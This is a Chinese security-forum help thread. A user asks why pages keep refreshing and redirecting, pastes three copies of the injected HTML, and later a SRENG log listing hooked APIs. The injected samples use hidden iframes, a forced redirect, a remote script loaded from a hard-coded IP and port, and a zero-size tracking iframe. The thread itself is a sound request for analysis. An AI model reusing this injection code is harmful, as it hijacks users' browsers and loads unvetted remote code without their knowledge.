瑞星卡卡安全论坛

发作症状
随机出现.打开一个网页一直刷新.直到网页死机关闭.
下面的样本是在网页死机关闭前查看的源文件
本机装了冰点还原.瑞星杀毒.防火墙.卡助手.都没有查出异常

样本一

<html>
<head><title> </title>
<style>html{ overflow:hidden; }</style>
<script>
<!--
function goURL()
{
    var desturl="http://kefu.xoyo.com/gonggao/jxsj/2009-06-15/661817.shtml";
    if (desturl.slice(desturl.length-1)=="/" ) desturl=desturl.slice(0,desturl.length-1);
    return "<html></head><script>document.location.replace(\""+desturl+"\");<\/script><\/html>";
}
var pushsn = "1245030806";
var aduser = "aHM4MDQ1MDQy";
var adfile = "ad090527102039.php";
//-->
</script>
</head>
<body style="margin:0px;overflow:hidden;" scroll="no">
<iframe id="ifrName" width="100%" height="100%" frameborder="no" scrolling="yes" src="JavaScript:parent.goURL();"></iframe>
<script id="adjs" src="http://61.183.0.79:3437/js/wpopup.js"></script>
<script>
<!--
    setTimeout("top.document.location.href=document.getElementById('ifrName').src",30000  );
//-->
</script>
<script>
<!--
    var adurl="http://61.183.0.79:3437/push_count.php?aduser="+aduser+"&pushsn="+pushsn;
    document.write("<IFRAME width=\"0\" height=\"0\" src=\""+adurl+"\"></IFRAME>");
//-->
</script>
</body>
</html>


样本二

<html>
<head><title> </title>
<style>html{ overflow:hidden; }</style>
<script>
<!--
function goURL()
{
    var desturl="http://www.sina.com.cn/";
    if (desturl.slice(desturl.length-1)=="/" ) desturl=desturl.slice(0,desturl.length-1);
    return "<html></head><script>document.location.replace(\""+desturl+"\");<\/script><\/html>";
}
var pushsn = "1245030806";
var aduser = "aHM4MDQ1MDQy";
var adfile = "ad090527102039.php";
//-->
</script>
</head>
<body style="margin:0px;overflow:hidden;" scroll="no">
<iframe id="ifrName" width="100%" height="100%" frameborder="no" scrolling="yes" src="JavaScript:parent.goURL();"></iframe>
<script id="adjs" src="http://61.183.0.79:3437/js/wpopup.js"></script>
<script>
<!--
    setTimeout("top.document.location.href=document.getElementById('ifrName').src",30000  );
//-->
</script>
<script>
<!--
    var adurl="http://61.183.0.79:3437/push_count.php?aduser="+aduser+"&pushsn="+pushsn;
    document.write("<IFRAME width=\"0\" height=\"0\" src=\""+adurl+"\"></IFRAME>");
//-->
</script>
</body>
</html>


样本三

<html>
<head><title> </title>
<style>html{ overflow:hidden; }</style>
<script>
<!--
function goURL()
{
    var desturl="http://news.xinhuanet.com/world/2009-06/15/content_11544755.htm";
    if (desturl.slice(desturl.length-1)=="/" ) desturl=desturl.slice(0,desturl.length-1);
    return "<html></head><script>document.location.replace(\""+desturl+"\");<\/script><\/html>";
}
var pushsn = "1245030806";
var aduser = "aHM4MDQ1MDQy";
var adfile = "ad090527102039.php";
//-->
</script>
</head>
<body style="margin:0px;overflow:hidden;" scroll="no">
<iframe id="ifrName" width="100%" height="100%" frameborder="no" scrolling="yes" src="JavaScript:parent.goURL();"></iframe>
<script id="adjs" src="http://61.183.0.79:3437/js/wpopup.js"></script>
<script>
<!--
    setTimeout("top.document.location.href=document.getElementById('ifrName').src",30000  );
//-->
</script>
<script>
<!--
    var adurl="http://61.183.0.79:3437/push_count.php?aduser="+aduser+"&pushsn="+pushsn;
    document.write("<IFRAME width=\"0\" height=\"0\" src=\""+adurl+"\"></IFRAME>");
//-->
</script>
</body>
</html>

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

你修复下IE试试...

什么叫：“随机出现.打开一个网页一直刷新.直到网页死机关闭.”？？？？

打开的网页是固定的？？？还是不固定的？？？

打开的网页是固定的.就是同一个网页也是有时出现打开一个网页一直刷新.直到网页死机关闭.有时是正常的.:kaka4: 也不是一直纯粹的刷新他好像是一下打开[url=http://61.183.0.79/]http://61.183.0.79/[/url].....后面看不清
                                                            一下打开http://kefu.xoyo.com/gonggao/jxsj/2009-06-15/661817.shtml
就是样本里面那二个网址跳来跳去的样子

用SRENG工具扫描系统日志发这论坛来

点击下载：SRENG工具  (内附说明）（右键选择“目标另存为”下载）

建议日志文件以附件形式发来
点击我这贴右下角的“引用”,然后就应该知道怎么发了。

日志文件SREngLOG09616.log发上来了

附件: SREngLOG09616.log

天月谢谢你了啊.
我那个冰点还原是开机还原的.现在的毒真是厉害
:kaka8:

汗

日志没看出什么，实在不知道什么原因了

API HOOK
入口点错误：NtCreateFile (危险等级: 高,  被下面模块所HOOK: 0x003C56D5)
入口点错误：NtCreateKey (危险等级: 高,  被下面模块所HOOK: 0x003C5875)
入口点错误：NtLoadDriver (危险等级: 高,  被下面模块所HOOK: 0x003C5FC5)
入口点错误：NtSetValueKey (危险等级: 高,  被下面模块所HOOK: 0x003C5945)
入口点错误：NtWriteFile (危险等级: 高,  被下面模块所HOOK: 0x003C57A5)
入口点错误：ZwCreateFile (危险等级: 高,  被下面模块所HOOK: 0x003C56D5)
入口点错误：ZwCreateKey (危险等级: 高,  被下面模块所HOOK: 0x003C5875)
入口点错误：ZwSetValueKey (危险等级: 高,  被下面模块所HOOK: 0x003C5945)
入口点错误：ZwWriteFile (危险等级: 高,  被下面模块所HOOK: 0x003C57A5)
入口点错误：CreateServiceA (危险等级: 高,  被下面模块所HOOK: 0x003C5C85)
入口点错误：CreateServiceW (危险等级: 高,  被下面模块所HOOK: 0x003C5D55)
入口点错误：LoadLibraryA (危险等级: 高,  被下面模块所HOOK: 0x003C6985)
入口点错误：LoadLibraryExW (危险等级: 高,  被下面模块所HOOK: 0x003C556D)
入口点错误：CreateFileW (危险等级: 高,  被下面模块所HOOK: 0x003C64A5)
入口点错误：CreateProcessA (危险等级: 高,  被下面模块所HOOK: 0x003C68B5)
入口点错误：CreateProcessW (危险等级: 高,  被下面模块所HOOK: 0x003C6715)
知道这是什么回事?是什么病毒的反应?

那SRENG的所有提示和你无关

安全软件都容易导致那个提示出现

恩知道.我怕是病毒作用的反应

修复IE,清理临时文件包括垃圾.

还有一个就是启动项目里面.注册表里面有一个选项.叫AppInit_Dll有问题
帮忙看下谢谢了

还是那句话

SRENG的提示和你无关

那是卡卡助手导致的，不管它

唉

这SRENG工具当初不提示这些多好

:kaka8: :kaka8: 不好意思.新手

理论上.冰点还原的开机还原功能在正常工作情况下.硬盘应该是不会被修改吧,就算改了保存不了.开机还原了?是吗?

修复不了.没有要修复的:kaka8:

是的

你如果设置冰点是重启还原的

那么你改了的任何东西，重启后都会被还原

注册表应该是在系统盘里吧?能不能驻留内存或是主板.引导区什么特殊地方吗?就像开机引导.我的意思就是像瑞星有时更新需要重启.重启还是接着完成后半更新那样子的

注册表应该是在系统盘里吧?

是的，就是在系统盘内。

能不能驻留内存或是主板.引导区什么特殊地方吗?

不懂你想问什么。

就像开机引导.我的意思就是像瑞星有时更新需要重启.重启还是接着完成后半更新那样子的

什么叫半更新？？？

就像开机引导.我的意思就是像瑞星有时更新需要重启.重启还是接着完成后半更新那样子的

什么叫半更新？？？

完成 后半更新.就是瑞星有时更新不是要重启吗?重启后接着更新就是后面半部分更新啊.有的文件只能重启更换的.就像系统文件不能开机删除更换啊

能不能驻留内存或是主板.引导区什么特殊地方吗?

不懂你想问什么。

就像上面瑞星更新一样.重启了还接着更新一样.我也不知道怎么表达了.:kaka8:
谢谢你了

噢

懂你的意思了

如果你的系统原本是设置了冰点重启还原的话

那么那个是不可能做到任何方式驻留重启还能做事的。

因为任何系统内的改变，重启就被冰点清空了

恩.你的解答收到.

首先非常谢谢你们各位的解答的非常快.

最后一个问题就是

我最开始发出来的样本你们能看懂不.

能的话,你们如果有空帮我注释一下.

能知道是什么(是木马还是病毒)搞出来的更好.
(那样本是网站木马还是微金病毒什么别的病毒的搞出来的?)

再次表示感谢.